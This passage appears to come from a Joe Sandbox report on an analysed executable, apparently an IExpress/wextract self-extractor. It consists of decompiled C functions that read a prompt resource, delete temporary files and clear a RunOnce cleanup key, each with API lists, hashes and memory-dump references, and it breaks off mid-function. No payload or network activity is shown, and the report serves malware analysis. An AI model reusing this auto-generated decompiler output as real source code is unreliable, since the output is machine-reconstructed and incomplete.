                                                                                                                                                                                                        • Instruction ID: 95e9ca28e0512109e9f7f7741f59206b2b59703dd5021cc90442fb71e731f4c0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a3c322bce1b33cbf18abee525da4b48622a74d1489d10c69ee4a4af5d8100de
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65319131641218ABEB209B65DC5DFAB77BCEB99705F1001ADF555E2161CB304E85CB21
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 652 bc51e5-bc520b call bc468f LocalAlloc 655 bc522d-bc523c call bc468f 652->655 656 bc520d-bc5228 call bc44b9 call bc6285 652->656 662 bc523e-bc5260 call bc44b9 LocalFree 655->662 663 bc5262-bc5270 lstrcmpA 655->663 669 bc52b0 656->669 662->669 666 bc527e-bc529c call bc44b9 LocalFree 663->666 667 bc5272-bc5273 LocalFree 663->667 674 bc529e-bc52a4 666->674 675 bc52a6 666->675 671 bc5279-bc527c 667->671 673 bc52b2-bc52b5 669->673 671->673 674->671 675->669
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E00BC468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E00BC468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E00BC44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0xbc9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0xbc9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E00BC44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0xbc9124 = 0x80070714;
					goto L10;
				}
				E00BC44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xbc9124 = E00BC6285();
				goto L10;
			}






                                                                                                                                                                                                        0x00bc51fb
                                                                                                                                                                                                        0x00bc5207
                                                                                                                                                                                                        0x00bc520b
                                                                                                                                                                                                        0x00bc523c
                                                                                                                                                                                                        0x00bc5268
                                                                                                                                                                                                        0x00bc5270
                                                                                                                                                                                                        0x00bc528b
                                                                                                                                                                                                        0x00bc5293
                                                                                                                                                                                                        0x00bc529c
                                                                                                                                                                                                        0x00bc52a6
                                                                                                                                                                                                        0x00bc52b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc52b0
                                                                                                                                                                                                        0x00bc529e
                                                                                                                                                                                                        0x00bc5279
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc527b
                                                                                                                                                                                                        0x00bc5273
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5273
                                                                                                                                                                                                        0x00bc524a
                                                                                                                                                                                                        0x00bc5250
                                                                                                                                                                                                        0x00bc5256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5256
                                                                                                                                                                                                        0x00bc5219
                                                                                                                                                                                                        0x00bc5223
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00BC2F4D,?,00000002,00000000), ref: 00BC5201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00BC5250
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                          • Part of subcall function 00BC6285: GetLastError.KERNEL32(00BC5BBC), ref: 00BC6285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 7ba02e14a7ffe65fe58b9a7f42a72bcfd05e66909e98ab22cb5a077f73afede6
                                                                                                                                                                                                        • Instruction ID: 87380b0484c53bbb98ebd6366b97b16e65109e23a5be85427584f2c50ccf7299
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ba02e14a7ffe65fe58b9a7f42a72bcfd05e66909e98ab22cb5a077f73afede6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C41104B1300A05BFE3246B715C9AF3B61DDDBCD384B1044ADF642EB290DEB89C004238
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E00BC52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0xbc91e0; // 0x31d8ea8
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0xbc8a24 == 0 &&  *0xbc9a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0xbc8a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0xbc8a24 == 0 &&  *0xbc9a30 == 0) {
					_push(_t22);
					E00BC1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
					if(( *0xbc9a34 & 0x00000020) != 0) {
						E00BC65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00BC2390( &_v268);
					_t11 =  *0xbc8a20; // 0x0
				}
				if( *0xbc9a40 != 1 && _t11 != 0) {
					_t11 = E00BC1FE1(_t22); // executed
				}
				 *0xbc8a20 =  *0xbc8a20 & 0x00000000;
				return E00BC6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}












                                                                                                                                                                                                        0x00bc52b6
                                                                                                                                                                                                        0x00bc52b6
                                                                                                                                                                                                        0x00bc52b6
                                                                                                                                                                                                        0x00bc52c1
                                                                                                                                                                                                        0x00bc52c8
                                                                                                                                                                                                        0x00bc52cb
                                                                                                                                                                                                        0x00bc52cc
                                                                                                                                                                                                        0x00bc52d4
                                                                                                                                                                                                        0x00bc52d6
                                                                                                                                                                                                        0x00bc52d7
                                                                                                                                                                                                        0x00bc52de
                                                                                                                                                                                                        0x00bc52e0
                                                                                                                                                                                                        0x00bc52f2
                                                                                                                                                                                                        0x00bc52fa
                                                                                                                                                                                                        0x00bc52fa
                                                                                                                                                                                                        0x00bc5302
                                                                                                                                                                                                        0x00bc5305
                                                                                                                                                                                                        0x00bc530c
                                                                                                                                                                                                        0x00bc5312
                                                                                                                                                                                                        0x00bc5316
                                                                                                                                                                                                        0x00bc5316
                                                                                                                                                                                                        0x00bc5317
                                                                                                                                                                                                        0x00bc531c
                                                                                                                                                                                                        0x00bc531f
                                                                                                                                                                                                        0x00bc5333
                                                                                                                                                                                                        0x00bc5345
                                                                                                                                                                                                        0x00bc5351
                                                                                                                                                                                                        0x00bc5359
                                                                                                                                                                                                        0x00bc5359
                                                                                                                                                                                                        0x00bc5363
                                                                                                                                                                                                        0x00bc5369
                                                                                                                                                                                                        0x00bc536f
                                                                                                                                                                                                        0x00bc5374
                                                                                                                                                                                                        0x00bc5374
                                                                                                                                                                                                        0x00bc5381
                                                                                                                                                                                                        0x00bc5387
                                                                                                                                                                                                        0x00bc5387
                                                                                                                                                                                                        0x00bc538f
                                                                                                                                                                                                        0x00bc53a0

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(031D8EA8,00000080,?,00000000), ref: 00BC52F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(031D8EA8), ref: 00BC52FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(031D8EA8,?,00000000), ref: 00BC5305
                                                                                                                                                                                                        • LocalFree.KERNEL32(031D8EA8), ref: 00BC530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00BC11FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC5363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00BC5334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-3290032183
                                                                                                                                                                                                        • Opcode ID: 13d4d1c6a3bd50f62276aa9c0b9e9fd94f4f2ce881139e4f3ad3172e78f73767
                                                                                                                                                                                                        • Instruction ID: b290e3d5b9264e46b4e5204dea38c7bca2554423f2a92a4268a5bbd9d71eb4fb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13d4d1c6a3bd50f62276aa9c0b9e9fd94f4f2ce881139e4f3ad3172e78f73767
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7217C31500648DFDB319B24DD09F6977E4FB98795F0401ADF446A71A0CFB4AC84CB54
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC1FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0xbc8530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





                                                                                                                                                                                                        0x00bc1fee
                                                                                                                                                                                                        0x00bc2005
                                                                                                                                                                                                        0x00bc200d
                                                                                                                                                                                                        0x00bc2017
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2020
                                                                                                                                                                                                        0x00bc200d
                                                                                                                                                                                                        0x00bc2029

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00BC538C,?,?,00BC538C), ref: 00BC2005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(00BC538C,wextract_cleanup2,?,?,00BC538C), ref: 00BC2017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00BC538C,?,?,00BC538C), ref: 00BC2020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 849931509-3354236729
                                                                                                                                                                                                        • Opcode ID: 614d00708ad21e34ed8aff21a533a36edeb8820abe7978d8be5fcf70e6f33b67
                                                                                                                                                                                                        • Instruction ID: ff673b5a32791d56db87b4bb2b620d24e912a26fc8784cd02a2ca5a8da19411a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 614d00708ad21e34ed8aff21a533a36edeb8820abe7978d8be5fcf70e6f33b67
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEE04F30550318BBD7229B90EC0AF597BA9F708785F1001D9B904A2061EFA15A14D605
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00BC4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0xbc8004; // 0x9f7d84ca
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0xbc91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00BC4E99(_t75);
						L35:
						return E00BC6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0xbc8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0xbc91e4;
						_t58 = 0xbc91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0xbc91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0xbc91e4;
						_t30 = E00BC4702( &_v268, 0xbc91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E00BC476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00BC4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E00BC47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0xbc93f4 =  *0xbc93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0xbc91e4;
						_t63 = 0xbc91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0xbc91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0xbc91e4;
						_t30 = E00BC4702( &_v268, 0xbc91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00BC4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00BC4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00BC4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                        0x00bc4cd0
                                                                                                                                                                                                        0x00bc4cdb
                                                                                                                                                                                                        0x00bc4ce0
                                                                                                                                                                                                        0x00bc4ce2
                                                                                                                                                                                                        0x00bc4cee
                                                                                                                                                                                                        0x00bc4cf2
                                                                                                                                                                                                        0x00bc4d0e
                                                                                                                                                                                                        0x00bc4d0e
                                                                                                                                                                                                        0x00bc4d11
                                                                                                                                                                                                        0x00bc4e83
                                                                                                                                                                                                        0x00bc4e88
                                                                                                                                                                                                        0x00bc4e98
                                                                                                                                                                                                        0x00bc4e98
                                                                                                                                                                                                        0x00bc4d17
                                                                                                                                                                                                        0x00bc4d17
                                                                                                                                                                                                        0x00bc4d1a
                                                                                                                                                                                                        0x00bc4d2f
                                                                                                                                                                                                        0x00bc4d2f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4d2f
                                                                                                                                                                                                        0x00bc4d1c
                                                                                                                                                                                                        0x00bc4d1c
                                                                                                                                                                                                        0x00bc4d1f
                                                                                                                                                                                                        0x00bc4dcb
                                                                                                                                                                                                        0x00bc4dd0
                                                                                                                                                                                                        0x00bc4dd2
                                                                                                                                                                                                        0x00bc4ddd
                                                                                                                                                                                                        0x00bc4ddd
                                                                                                                                                                                                        0x00bc4de3
                                                                                                                                                                                                        0x00bc4de8
                                                                                                                                                                                                        0x00bc4ded
                                                                                                                                                                                                        0x00bc4ded
                                                                                                                                                                                                        0x00bc4def
                                                                                                                                                                                                        0x00bc4df0
                                                                                                                                                                                                        0x00bc4df0
                                                                                                                                                                                                        0x00bc4df4
                                                                                                                                                                                                        0x00bc4df4
                                                                                                                                                                                                        0x00bc4df6
                                                                                                                                                                                                        0x00bc4df9
                                                                                                                                                                                                        0x00bc4dfc
                                                                                                                                                                                                        0x00bc4dfc
                                                                                                                                                                                                        0x00bc4dfe
                                                                                                                                                                                                        0x00bc4dff
                                                                                                                                                                                                        0x00bc4dff
                                                                                                                                                                                                        0x00bc4e03
                                                                                                                                                                                                        0x00bc4e08
                                                                                                                                                                                                        0x00bc4e0a
                                                                                                                                                                                                        0x00bc4e0f
                                                                                                                                                                                                        0x00bc4d03
                                                                                                                                                                                                        0x00bc4d03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4d03
                                                                                                                                                                                                        0x00bc4e18
                                                                                                                                                                                                        0x00bc4e20
                                                                                                                                                                                                        0x00bc4e25
                                                                                                                                                                                                        0x00bc4e27
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4e33
                                                                                                                                                                                                        0x00bc4e38
                                                                                                                                                                                                        0x00bc4e3a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4e40
                                                                                                                                                                                                        0x00bc4e51
                                                                                                                                                                                                        0x00bc4e56
                                                                                                                                                                                                        0x00bc4e5b
                                                                                                                                                                                                        0x00bc4e5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4e6a
                                                                                                                                                                                                        0x00bc4e6f
                                                                                                                                                                                                        0x00bc4e71
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4e77
                                                                                                                                                                                                        0x00bc4e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4e7d
                                                                                                                                                                                                        0x00bc4d25
                                                                                                                                                                                                        0x00bc4d25
                                                                                                                                                                                                        0x00bc4d28
                                                                                                                                                                                                        0x00bc4d36
                                                                                                                                                                                                        0x00bc4d3b
                                                                                                                                                                                                        0x00bc4d40
                                                                                                                                                                                                        0x00bc4d40
                                                                                                                                                                                                        0x00bc4d42
                                                                                                                                                                                                        0x00bc4d43
                                                                                                                                                                                                        0x00bc4d43
                                                                                                                                                                                                        0x00bc4d47
                                                                                                                                                                                                        0x00bc4d4a
                                                                                                                                                                                                        0x00bc4d4a
                                                                                                                                                                                                        0x00bc4d4c
                                                                                                                                                                                                        0x00bc4d4f
                                                                                                                                                                                                        0x00bc4d4f
                                                                                                                                                                                                        0x00bc4d51
                                                                                                                                                                                                        0x00bc4d52
                                                                                                                                                                                                        0x00bc4d52
                                                                                                                                                                                                        0x00bc4d56
                                                                                                                                                                                                        0x00bc4d5b
                                                                                                                                                                                                        0x00bc4d5d
                                                                                                                                                                                                        0x00bc4d62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4d67
                                                                                                                                                                                                        0x00bc4d6f
                                                                                                                                                                                                        0x00bc4d74
                                                                                                                                                                                                        0x00bc4d76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4d7c
                                                                                                                                                                                                        0x00bc4d84
                                                                                                                                                                                                        0x00bc4d89
                                                                                                                                                                                                        0x00bc4d8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4d94
                                                                                                                                                                                                        0x00bc4d99
                                                                                                                                                                                                        0x00bc4d9e
                                                                                                                                                                                                        0x00bc4da1
                                                                                                                                                                                                        0x00bc4daa
                                                                                                                                                                                                        0x00bc4daa
                                                                                                                                                                                                        0x00bc4da3
                                                                                                                                                                                                        0x00bc4da3
                                                                                                                                                                                                        0x00bc4da3
                                                                                                                                                                                                        0x00bc4db5
                                                                                                                                                                                                        0x00bc4dbb
                                                                                                                                                                                                        0x00bc4dbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4dc3
                                                                                                                                                                                                        0x00bc4dc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4dc5
                                                                                                                                                                                                        0x00bc4dbd
                                                                                                                                                                                                        0x00bc4d2a
                                                                                                                                                                                                        0x00bc4d2a
                                                                                                                                                                                                        0x00bc4d2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4d2d
                                                                                                                                                                                                        0x00bc4cf8
                                                                                                                                                                                                        0x00bc4cfd
                                                                                                                                                                                                        0x00bc4d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00BC4DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00BC4DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-3290032183
                                                                                                                                                                                                        • Opcode ID: 32b2f9ab0af11ddc439431dfcfc3fa865db8b531bacb8efe6f108498f94c92aa
                                                                                                                                                                                                        • Instruction ID: 3f47993a30b0ee776e1380f39870ecae5723a342359c6431f18a21cba917314e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32b2f9ab0af11ddc439431dfcfc3fa865db8b531bacb8efe6f108498f94c92aa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0241DE362002069ACB25AF28D9A8FB673E5EB45300B0846FDE88397295DB31DF4AC750
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC4C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC4C37(signed int __ecx, int __edx, int _a4) {
